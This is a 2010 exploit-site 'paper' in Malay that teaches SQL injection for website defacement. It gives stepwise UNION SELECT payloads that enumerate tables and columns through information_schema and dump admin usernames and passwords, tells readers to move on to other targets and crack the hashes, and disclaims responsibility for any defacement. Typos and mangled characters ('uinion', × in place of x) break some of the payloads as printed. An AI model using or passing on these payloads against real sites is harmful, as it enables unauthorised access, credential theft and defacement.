# Exploit Title: [paper] Tutorial SQL injection secara ringkas
# Date: January 19th, 2010
# Author: r3v3r7
# Greetz: n3wb0rn, hmsec, tbdsec...
# Language: Bahasa Melayu

--------------------------------------------------------------------------------------
					Pengenalan:
--------------------------------------------------------------------------------------

Defacement? Best ker? bagaimana caranya? Sebelum tu apa itu SQL dan SQL injection? ok, SQL ialah Structured Query Language.. cara sebutannya ialah es-q-el dan bukannya sequel(ramai yang menyebut seperti ini)… SQL sebenarnya ialah Relational Database Management sayastem, database schema creation and modification, and database object access control management.

    Ok, SQL injection pula ialah satu tekinik untuk mendapatkn error pada sesuatu laman web… contohnya, 1=1 ialah TRUE dan 1=0 ialah FALSE, maka, statement TRUE akan digunakan memaparkan isi kandungan web tersebut.. Dan jika statement itu FALSE, maka web tidak akan memaparkan isi kandungan yang sepatutnya…

    Bagaimana untuk menjadikan sesebuah web itu untuk memaparkan statement FALSE? Sebenarnya, ia bergantung samada web itu telah diPATCH/diFILTER daripada vuln, bug, error atau exploit…

    Bagaimana pula untuk mengetahui samada sesebuah web itu mempunyai vuln/bug? Banyak cara dapat digunakan seperti menggunakan vuln scanner, google dork(ikut nasib), bot, dan lain2 lagi…

--------------------------------------------------------------------------------------
					Langkah-langkah:
--------------------------------------------------------------------------------------
    ok, sekarang saat yang ditunggu..caranya:

    lihat pada url spt:

    http://target/index.php?id=8

    cuba tambahkan tanda ‘ pada akhir url spt:

    http://target/index.php?id=8&#8242;

    ataupun and 1=1-- untuk TRUE dan 1=0-- untuk FALSE

    abaikan tanda %20 pada url kerana itu hanya sayambol untuk space

    lihat apa yang terjadi pada web tersebut.. ada error yang keluar? jika ada error maka web tersebut 99% boleh ditembusi dan jika tiada apa2 yang terjadi
    maka web tersebut telah pn diPATCH..maka, carilah target lain..

    contoh error spt:

    Warining: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /homepages/xxx/xxx/xxx/www/home.php on line 16

    seterusnya cari pada column ke berapa boleh menjalankan injection..oleh itu jalankn perintah order by..contohnya:

    http://target/index.php?id=8 order by 10

    lihat samada masih ad error atau tidak.. jika ada, bagus, dan jika tiada tambah bilangan order by… contohnya:

    http://target/index.php?id=8 order by 20

    seterusnya, cari sehingga error terakhir… contoh:

    http://target/index.php?id=8 order by 8 ——> error

    http://target/index.php?id=8 order by 7 ——-> tiada error

    maka, iini bermaksud order by 7 ialah error terakhir..

    seterusnya jalankn perintah uinion select… contoh:

    http://target/index.php?id=-8+uinion+select+1,2,3,4,5,6,7--

    note: mesti sehingga no last error tadi dan jangan lupa tanda – pada depan no id dan tanda -- pada akhir url…

    Lihat ada atau tidak no ajaib yang muncul pada web…

    A’ha.. pada no yang muncul itulah kita akan menjalankan operasi..huhuhu..

    Disini ada beberapa perintah yang biasa dijalankan pada tempat no ajaib itu tadi:

    database() : Menampilkan nama database yang digunakan
    user() : Username pada database tersebut
    version() : Melihat versi database

    Andaikan no ajaib kita ialah 2 dan 3.. Dan cara untuk menjalankan perintah diatas ialah:

    http://target/index.php?id=-8+uinion+select+1,user(),version(),4,5,6,7--

    maka kita akan melihat:

    root@localhost —–> username pada database

    5.0.45-commuinity-nt ——-> version database

    hahah..beruntung sebab dapat version 5.. kenapa? nanti saya terangkn..

    Seterusnya, cari table yang terdapat pada database itu..

    Jalankan perintah group_concat(table_name) pada tempat no ajaib dan +from+information_schema.tables+where+table_schema=database()– pada akhir url..

    contoh:

    http://target/index.php?id=-8+uinion+select+1,group_concat(table_name),version(),4,5,6,7
    +from+information_schema.tables+where+table_schema=database()–

    maka akan terpapar banyak nama table dan kita hanya akan ambil 1 yang menarik yang agak2 mempunyai username dan password admin..huhuhu..

    contohny: tbl_admin, user, users, private, dll lagi..

    Kita perlu convert nama table kpd bentuk hexa untuk mengelakkan error..saya menggunakn web: http://www.string-functions.com/string-hex.aspx..

    Setelah saya convert tbl_admin, outputnya ialah 74626c5f61646d696e… maka kita perlu menambah angka 0 dan huruf x pada awal hasil hexa tadi..

    contoh: 0×74626c5f61646d696e

    Seterusnya dapatkn pula nama column…Jalankn perintah group_concat(column_name)..contoh:

    http://target/index.php?id=-8+uinion+select+1,group_concat(column_name),version(),4,5,6,7
    +from+information_schema.columns+where+table_name=0×7461626c655f75736572–

    Maka, nama column akan terpapar pada web itu..

    contoh: id, usermane, password, date, etc…

    yeah.. sudah dapat.. maka jalankn perintah:

    http://target/index.php?id=-8+uinion+select+1,database(),
    concat(user,0×3a,password),4,5+from+tbl_admin–

    note: 0×3a ialah pemisah tanda :

    Akhirnya, username dan password akan terpapar..hahaha.. so, boleh la kita login tetapi kita perlu crack dlu password die..(tanya google)..huhuhu…

--------------------------------------------------------------------------------------
   				Disebalik database "information_schema":
--------------------------------------------------------------------------------------

    Secara default ketika menginstall MySQL Versi 5 terdapat database information_schema dan semua nama table dan colomn dari database() disimpan didalam database information_schema..

    note: Kenapa MySQL Version 4 susah di-inject?

    MySQL version 4 tidak mempunyai database information_schema… maka untuk mendapatkan nama table ialah dengan cara hentam, sental alam, tembak, apa2 lg la istilah anda.. Cara lain ialah menggunakan tool Fuzzer spt schemafuzz…

    Emm..nampaknya itu saja.. SQL injection sebenarnya dapat dilakukan dgn banyak cara lagi bergantung pada skill seseorg..

--------------------------------------------------------------------------------------
					Penutup:
--------------------------------------------------------------------------------------

    Saya TIDAK bertanggungjawab atas semua defacement yang anda lakukan.. disini hanya panduan konsep dan sebenarnya adalah salah admin itu sendiri kerana lalai dalam mengawal kesamatan server/web mereka sendiri..